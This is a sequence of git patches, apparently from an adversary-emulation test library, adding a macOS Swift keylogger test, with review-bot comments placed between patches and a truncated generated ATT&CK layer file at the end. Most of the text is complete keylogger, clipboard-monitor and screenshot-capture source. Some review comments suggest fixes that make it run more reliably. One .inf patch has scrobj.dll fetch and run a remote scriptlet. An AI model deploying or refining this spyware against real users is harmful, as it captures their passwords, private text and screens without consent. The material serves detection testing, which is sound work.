swiftSpy.ClipboardMonitor() - - } - DispatchQueue.global(qos: .background).async { - swiftSpy.Keylog() - - } - swiftSpy.ActiveApp() - } - if argument.contains("-screenshot") - { - var folder = CommandLine.arguments[2] - if (!folder.hasSuffix("/")) - { - folder.append("/") - } - - if CommandLine.arguments.count == 4 - { - let timer = UInt32(CommandLine.arguments[3]) - - while(true) - { - swiftSpy.Screenshot(folderName: folder) - sleep(timer!) - } - } - else - { - swiftSpy.Screenshot(folderName: folder) - } - } - } - } -} 
From c8b80f6fcef2a813efebde907c73b387af228399 Mon Sep 17 00:00:00 2001
From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com>
Date: Thu, 9 Jun 2022 10:19:55 -0500
Subject: [PATCH 06/11] Add files via upload
---
 atomics/T1056.001/src/MacOSKeylogger.swift | 403 +++++++++++++++++++++
 1 file changed, 403 insertions(+)
 create mode 100644 atomics/T1056.001/src/MacOSKeylogger.swift
diff --git a/atomics/T1056.001/src/MacOSKeylogger.swift b/atomics/T1056.001/src/MacOSKeylogger.swift
new file mode 100644
index 00000000..c842aaca
--- /dev/null
+++ b/atomics/T1056.001/src/MacOSKeylogger.swift
@@ -0,0 +1,403 @@
+#!/usr/bin/swift
+import Cocoa
+import Foundation
+import IOKit.hid
+import AppKit
+
+
+var capslock = false
+
+var keyMap: [UInt32:[String]]
+{
+ var map = [UInt32:[String]]()
+ map[4] = ["a","A"]
+ map[5] = ["b","B"]
+ map[6] = ["c","C"]
+ map[7] = ["d","D"]
+ map[8] = ["e","E"]
+ map[9] = ["f","F"]
+ map[10] = ["g","G"]
+ map[11] = ["h","H"]
+ map[12] = ["i","I"]
+ map[13] = ["j","J"]
+ map[14] = ["k","K"]
+ map[15] = ["l","L"]
+ map[16] = ["m","M"]
+ map[17] = ["n","N"]
+ map[18] = ["o","O"]
+ map[19] = ["p","P"]
+ map[20] = ["q","Q"]
+ map[21] = ["r","R"]
+ map[22] = ["s","S"]
+ map[23] = ["t","T"]
+ map[24] = ["u","U"]
+ map[25] = ["v","V"]
+ map[26] = ["w","W"]
+ map[27] = ["x","X"]
+ map[28] = ["y","Y"]
+ map[29] = ["z","Z"]
+ map[30] = ["1","!"]
+ map[31] = ["2","@"]
+ map[32] = ["3","#"]
+ map[33] = ["4","$"]
+ map[34] = ["5","%"]
+ map[35] = ["6","^"]
+ map[36] = ["7","&"]
+ map[37] = ["8","*"]
+ map[38] = ["9","("]
+ map[39] = ["0",")"]
+ map[40] = ["\n","\n"]
+ map[41] = ["[ESCAPE]","[ESCAPE]"]
+ map[42] = ["[DELETE|BACKSPACE]","[DELETE|BACKSPACE]"] //
+ map[43] = ["[TAB]","[TAB]"]
+ map[44] = [" "," "]
+ map[45] = ["-","_"]
+ map[46] = ["=","+"]
+ map[47] = ["[","{"]
+ map[48] = ["]","}"]
+ map[49] = ["\\","|"]
+ map[50] = ["",""] // Keyboard Non-US# and ~2
+ map[51] = [";",":"]
+ map[52] = ["'","\""]
+ map[53] = ["`","~"]
+ map[54] = [",","<"]
+ map[55] = [".",">"]
+ map[56] = ["/","?"]
+ map[57] = ["[CAPSLOCK]","[CAPSLOCK]"]
+ map[58] = ["[F1]","[F1]"]
+ map[59] = ["[F2]","[F2]"]
+ map[60] = ["[F3]","[F3]"]
+ map[61] = ["[F4]","[F4]"]
+ map[62] = ["[F5]","[F5]"]
+ map[63] = ["[F6]","[F6]"]
+ map[64] = ["[F7]","[F7]"]
+ map[65] = ["[F8]","[F8]"]
+ map[66] = ["[F9]","[F9]"]
+ map[67] = ["[F10]","[F10]"]
+ map[68] = ["[F11]","[F11]"]
+ map[69] = ["[F12]","[F12]"]
+ map[70] = ["[PRINTSCREEN]","[PRINTSCREEN]"]
+ map[71] = ["[SCROLL-LOCK]","[SCROLL-LOCK]"]
+ map[72] = ["[PAUSE]","[PAUSE]"]
+ map[73] = ["[INSERT]","[INSERT]"]
+ map[74] = ["[HOME]","[HOME]"]
+ map[75] = ["[PAGEUP]","[PAGEUP]"]
+ map[76] = ["[DELETE-FORWARD]","[DELETE-FORWARD]"] //
+ map[77] = ["[END]","[END]"]
+ map[78] = ["[PAGEDOWN]","[PAGEDOWN]"]
+ map[79] = ["[RIGHTARROW]","[RIGHTARROW]"]
+ map[80] = ["[LEFTARROW]","[LEFTARROW]"]
+ map[81] = ["[DOWNARROW]","[DOWNARROW]"]
+ map[82] = ["[UPARROW]","[UPARROW]"]
+ map[83] = ["[NUMLOCK]","[CLEAR]"]
+ // Keypads
+ map[84] = ["/","/"]
+ map[85] = ["*","*"]
+ map[86] = ["-","-"]
+ map[87] = ["+","+"]
+ map[88] = ["[ENTER]","[ENTER]"]
+ map[89] = ["1","[END]"]
+ map[90] = ["2","[DOWNARROW]"]
+ map[91] = ["3","[PAGEDOWN]"]
+ map[92] = ["4","[LEFTARROW]"]
+ map[93] = ["5","5"]
+ map[94] = ["6","[RIGHTARROW]"]
+ map[95] = ["7","[HOME]"]
+ map[96] = ["8","[UPARROW]"]
+ map[97] = ["9","[PAGEUP]"]
+ map[98] = ["0","[INSERT]"]
+ map[99] = [".","[DELETE]"]
+ map[100] = ["",""] //
+ /////
+ map[224] = ["[LCTRL]","[LCTRL]"] // left control
+ map[225] = ["[LSHIFT_PRESS]","[SHIFT_RELEASE]"] // left shift
+ map[226] = ["[LALT]","[LALT]"] // left alt
+ map[227] = ["[LCMD]","[LCMD]"] // left cmd
+ map[228] = ["[RCTRL]","[RCTRL]"] // right control
+ map[229] = ["[RSHIFT_PRESS]","[SHIFT_RELEASE]"] // right shift
+ map[230] = ["[RALT]","[RALT]"] // right alt
+ map[231] = ["[RCMD]","[RCMD]"] // right cmd
+ return map
+}
+
+class SwiftSpy
+{
+ func ActiveApp()
+ {
+ // Hook active application
+ let notificationCenter = NSWorkspace.shared.notificationCenter
+ notificationCenter.addObserver(forName: NSWorkspace.didActivateApplicationNotification, object: nil, queue: OperationQueue.main)
+ { (notificationCenter: Notification) in
+
+ let currentApp = notificationCenter.userInfo!["NSWorkspaceApplicationKey"] as! NSRunningApplication
+ print("")
+ print("[+] New Active App:", currentApp.localizedName!)
+ }
+ RunLoop.current.run()
+ }
+
+ func ClipboardMonitor()
+ {
+ setbuf(__stdoutp, nil)
+ let pasteboard = NSPasteboard.general
+ var changeCount = NSPasteboard.general.changeCount
+ while true {
+ Thread.sleep(forTimeInterval: 1.0)
+ if let clipboardData = pasteboard.string(forType: .string)
+ {
+ if pasteboard.changeCount != changeCount
+ {
+ print("")
+ print("[+] Copy event detected at", NSDate(), "(UTC)!")
+ print("[+] Clipboard Data:", clipboardData)
+ changeCount = pasteboard.changeCount
+ }
+ }
+ }
+ }
+
+ // https://stackoverflow.com/questions/7190852/using-iohidmanager-to-get-modifier-key-events
+ // https://stackoverflow.com/questions/30380400/how-to-tap-hook-keyboard-events-in-osx-and-record-which-keyboard-fires-each-even
+ var Handle_IOHIDInputValueCallback: IOHIDValueCallback = { context, result, sender, value in
+ let elem: IOHIDElement = IOHIDValueGetElement(value);
+ let scancode = IOHIDElementGetUsage(elem);
+
+ if (IOHIDElementGetUsagePage(elem) != 0x07)
+ {
+ return
+ }
+
+ // invalid keys
+ if (scancode < 4 || scancode > 231)
+ {
+ return;
+ }
+
+ // returns 1 when a key was pressed and 0 when a key is released
+ let pressed = IOHIDValueGetIntegerValue(value);
+ if (pressed == 1)
+ {
+ // modifying caplocks variable and return
+ if (scancode == 57)
+ {
+ capslock = !capslock
+ print(keyMap[scancode]![0], terminator:"")
+ return
+ }
+
+ // print shift up and return
+ if (scancode == 225 || scancode == 229)
+ {
+ print(keyMap[scancode]![0], terminator:"")
+ return
+ }
+
+ // no capslock
+ if (capslock == false)
+ {
+ print(keyMap[scancode]![0], terminator:"")
+
+ }
+ // capslock on
+ else if (capslock == true)
+ {
+ // only capitalize letters
+ if (scancode >= 4 && scancode <= 29)
+ {
+ print(keyMap[scancode]![1], terminator:"")
+ }
+ else
+ {
+ print(keyMap[scancode]![0], terminator:"")
+ }
+ }
+ }
+ else if((pressed == 0) && (scancode == 225 || scancode == 229))
+ {
+ print(keyMap[scancode]![1], terminator:"")
+ }
+ }
+
+ // https://stackoverflow.com/questions/8676135/osx-hid-filter-for-secondary-keyboard
+ // https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/HID/new_api_10_5/tn2187.html
+ // https://stackoverflow.com/questions/48070396/how-to-get-list-of-hid-devices-in-a-swift-cocoa-application
+ func Keylog()
+ {
+ // Create HID Manager
+ let HIDManager = IOHIDManagerCreate(kCFAllocatorDefault, 0)
+ if (CFGetTypeID(HIDManager) != IOHIDManagerGetTypeID())
+ {
+ print("[-] Could not create HID manager")
+ exit(1);
+ }
+ else
+ {
+ print("[+] HID manager created!")
+ }
+
+ // Setup device filtering,
+ func CreateDeviceMatchingDictionary( usagePage: Int, usage: Int) -> CFMutableDictionary {
+ let dict = [
+ kIOHIDDeviceUsageKey: usage,
+ kIOHIDDeviceUsagePageKey: usagePage
+ ] as NSDictionary
+
+ return dict.mutableCopy() as! NSMutableDictionary;
+ }
+ let keyboard = CreateDeviceMatchingDictionary(usagePage: kHIDPage_GenericDesktop, usage: kHIDUsage_GD_Keyboard)
+ IOHIDManagerSetDeviceMatching(HIDManager, keyboard)
+
+ // Enumerate keyboard devices
+ let devices = IOHIDManagerCopyDevices(HIDManager)
+ if (devices != nil) {
+ print("[+] HID Devices enumerated:")
+ print(devices!)
+ } + else + { + print("[-] Could not find any devices") + exit(1); + } + + // Setup callback + let context = UnsafeMutableRawPointer(Unmanaged.passUnretained(self).toOpaque()) + IOHIDManagerRegisterInputValueCallback(HIDManager, Handle_IOHIDInputValueCallback, context); + + // Open HID Manager + let ioreturn: IOReturn = IOHIDManagerOpen(HIDManager, IOOptionBits(kIOHIDOptionsTypeNone) ) + if ioreturn != kIOReturnSuccess + { + print("[-] Could not open HID manager") + print("\nThis is likely because the application running this does not have Input Monitoring permissions.") + print("You can enable them in System Preferences > Security and Privacy > Input Monitoring.") + exit(1); + } + else + { + print("[+] HID manager opened!") + } + + // Start RunLoop + let calendar = Calendar.current + IOHIDManagerScheduleWithRunLoop(HIDManager, CFRunLoopGetCurrent(), CFRunLoopMode.defaultMode.rawValue) + RunLoop.current.run(until: calendar.date(byAdding: .second, value: 5, to: Date.now)!) + exit(0); + } + + // https://stackoverflow.com/questions/39691106/programmatically-screenshot-swift-3-macos/40864231#40864231 + func Screenshot(folderName: String) + { + var displayCount: UInt32 = 0; + var result = CGGetActiveDisplayList(0, nil, &displayCount) + if (result != CGError.success) { + print("Error: \(result)") + return + } + let allocated = Int(displayCount) + let activeDisplays = UnsafeMutablePointer.allocate(capacity: allocated) + result = CGGetActiveDisplayList(displayCount, activeDisplays, &displayCount) + + if (result != CGError.success) { + print("Error: \(result)") + return + } + + for i in 1...displayCount { + let unixTimestamp = Date() + let fileUrl = URL(fileURLWithPath: folderName + "\(unixTimestamp)" + "_" + "\(i)" + ".jpg", isDirectory: true) + let screenShot:CGImage = CGDisplayCreateImage(activeDisplays[Int(i-1)])! + let bitmapRep = NSBitmapImageRep(cgImage: screenShot) + let jpegData = bitmapRep.representation(using: NSBitmapImageRep.FileType.jpeg, properties: [:])! 
+
+ do {
+ try jpegData.write(to: fileUrl, options: .atomic)
+ }
+ catch {print("Error: \(error)")}
+ }
+ }
+}
+
+func Help()
+{
+ print("SwiftSpy by @slyd0g")
+ print("Usage:")
+ print("-h || -help | Print help menu")
+ print("-keylog | Logs all keystrokes to stdout using IOHIDManager* APIs, requires 'Input Monitoring' permissions")
+ print("-clipboard | Monitors for changes to the system clipboard and logs to stdout")
+ print("-allkeys | Runs both the keylog and clipboard modules, requires 'Input Monitoring' permissions")
+ print("-screenshot /tmp | Takes a screenshot of the user's screen and saves to the /tmp, requires 'Screen Recording` permissions")
+ print("-screenshot /tmp 5 | Takes a screenshot every 5 seconds and saves to /tmp, requires 'Screen Recording` permissions")
+}
+
+var swiftSpy = SwiftSpy()
+
+if CommandLine.arguments.count == 1
+{
+ Help()
+ exit(0)
+}
+else
+{
+ for argument in CommandLine.arguments
+ {
+ if (argument.contains("-h") || argument.contains("-help"))
+ {
+ Help()
+ exit(0)
+ }
+ else
+ {
+ if argument.contains("-keylog")
+ {
+ DispatchQueue.global(qos: .background).async {
+ swiftSpy.Keylog()
+
+ }
+ swiftSpy.ActiveApp()
+ }
+ if argument.contains("-clipboard")
+ {
+ DispatchQueue.global(qos: .background).async {
+ swiftSpy.ClipboardMonitor()
+
+ }
+ swiftSpy.ActiveApp()
+ }
+ if argument.contains("-allkeys")
+ {
+ DispatchQueue.global(qos: .background).async {
+ swiftSpy.ClipboardMonitor()
+
+ }
+ DispatchQueue.global(qos: .background).async {
+ swiftSpy.Keylog()
+
+ }
+ swiftSpy.ActiveApp()
+ }
+ if argument.contains("-screenshot")
+ {
+ var folder = CommandLine.arguments[2]
+ if (!folder.hasSuffix("/"))
+ {
+ folder.append("/")
+ }
+
+ if CommandLine.arguments.count == 4
+ {
+ let timer = UInt32(CommandLine.arguments[3])
+
+ while(true)
+ {
+ swiftSpy.Screenshot(folderName: folder)
+ sleep(timer!)
+ }
+ }
+ else
+ {
+ swiftSpy.Screenshot(folderName: folder)
+ }
+ }
+ }
+ }
+}
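Review bot: The range check `if (scancode < 4 || scancode > 231)` in Handle_IOHIDInputValueCallback does not match the table it guards: keyMap only defines usages 4–100 and 224–231, so any usage in 101–223 (per the HID keyboard usage table this includes keypad `=` and F13–F24, which Apple extended keyboards report) reaches `keyMap[scancode]![0]` and traps, killing the logger mid-test. Replace the force-unwraps with one lookup that bails out, `guard let entry = keyMap[scancode] else { return }` placed right after the range check, and print `entry[0]` / `entry[1]` below it. keyMap is also a computed `var`, so the ~110-entry dictionary is rebuilt on every key event; `let keyMap: [UInt32:[String]] = { … }()` with the same body builds it once. In Screenshot, `for i in 1...displayCount` traps when `displayCount` is 0 and `activeDisplays` is never deallocated; `guard displayCount > 0 else { return }` before the allocation and `defer { activeDisplays.deallocate() }` after it close both.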
From 97049fe2fce28827b8ead1beef0773e225fa74cc Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Thu, 16 Jun 2022 10:38:03 -0500 Subject: [PATCH 07/11] Made requested changed --- atomics/T1056.001/T1056.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 122209d6..595f20bc 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -192,7 +192,7 @@ atomic_tests: echo "" executor: command: | - ./#{swift_src} -keylog + swift #{swift_src} -keylog cleanup_command: | kill `pgrep swift-frontend` name: bash From 3d7ae73566f673db828775e471401f40e0753911 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 16 Jun 2022 16:53:22 -0600 Subject: [PATCH 08/11] typo fix --- atomics/T1218.003/src/T1218.003.inf | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1218.003/src/T1218.003.inf b/atomics/T1218.003/src/T1218.003.inf index b41feb18..938ee84e 100644 --- a/atomics/T1218.003/src/T1218.003.inf +++ b/atomics/T1218.003/src/T1218.003.inf @@ -8,7 +8,7 @@ AdvancedINF=2.5 UnRegisterOCXs=UnRegisterOCXSection [UnRegisterOCXSection] -%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1191/src/T1218.003.sct +%11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.003/src/T1218.003.sct [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" From 2f47a4c4f2f0dbdcf33836adfe869e60a697a218 Mon Sep 17 00:00:00 2001 From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com> Date: Fri, 17 Jun 2022 10:05:33 -0500 Subject: [PATCH 09/11] Added Reference in yaml --- atomics/T1056.001/T1056.001.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 595f20bc..6f8fd663 100644 
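Review bot: The cleanup context line `kill \`pgrep swift-frontend\`` under the new `swift #{swift_src} -keylog` command kills every swift-frontend process on the host, not just this test's interpreter, so a concurrent Xcode or SwiftPM build on the same machine would be terminated; and because the script exits on its own after its 5-second run loop, `pgrep` usually matches nothing and `kill` then fails with a usage error. Scope the cleanup to this script and tolerate a no-match: `pkill -f "#{swift_src}" 2>/dev/null || true`. The new command line also leaves the path unquoted, which breaks when the atomics folder path contains a space; `swift "#{swift_src}" -keylog`.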
--- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -174,7 +174,8 @@ atomic_tests: - name: MacOS Swift Keylogger description: | Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. - Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring + Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. + Referece: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74 supported_platforms: - macos input_arguments: From c006599f059dd7d689136a9b419248b946b965f7 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Tue, 21 Jun 2022 14:08:07 +0000 Subject: [PATCH 10/11] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1056.001/T1056.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1056.001/T1056.001.yaml b/atomics/T1056.001/T1056.001.yaml index 6f8fd663..2ddcf45a 100644 --- a/atomics/T1056.001/T1056.001.yaml +++ b/atomics/T1056.001/T1056.001.yaml @@ -172,6 +172,7 @@ atomic_tests: cleanup_command: | systemctl restart auditd - name: MacOS Swift Keylogger + auto_generated_guid: aee3a097-4c5c-4fff-bbd3-0a705867ae29 description: | Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard. Input Monitoring is required. Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index a5d8863b..d22754e6 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1066,3 +1066,4 @@ cd925593-fbb4-486d-8def-16cbdf944bf4 123520cc-e998-471b-a920-bd28e3feafa0 df1efab7-bc6d-4b88-8be9-91f55ae017aa 29e0afca-8d1d-471a-8d34-25512fc48315 +aee3a097-4c5c-4fff-bbd3-0a705867ae29 
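Review bot: The added line has a typo, `Referece:` should be `Reference:`, and the sentence above it that the hunk keeps, "Utilizes a swift script to log keys to sout. It runs for 5 seconds then dumps the output to standard.", is garbled; suggest "Uses a Swift script to log keystrokes to stdout. It runs for 5 seconds and then prints everything captured to standard output." The description should also warn that the output is the user's real keystrokes: `Keystrokes typed during the 5-second window are written to stdout and will appear in any captured test output; do not enter credentials while the test runs.` The Input Monitoring path names System Preferences; on macOS 13 and later the pane is System Settings > Privacy & Security > Input Monitoring, which is worth stating alongside.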
From 589c71ee128706c5f0e3df4624e9596a6b1991f9 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Tue, 21 Jun 2022 14:08:13 +0000 Subject: [PATCH 11/11] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-macos.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/macos-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/macos-index.md | 6 +- atomics/Indexes/Matrices/macos-matrix.md | 4 +- atomics/Indexes/index.yaml | 70 +++++++++++++++++++ atomics/T1056.001/T1056.001.md | 53 ++++++++++++++ 8 files changed, 136 insertions(+), 5 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 9ea0a115..d5750671 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team (macOS)","versions":{"attack":"10","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["macOS"]},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View 
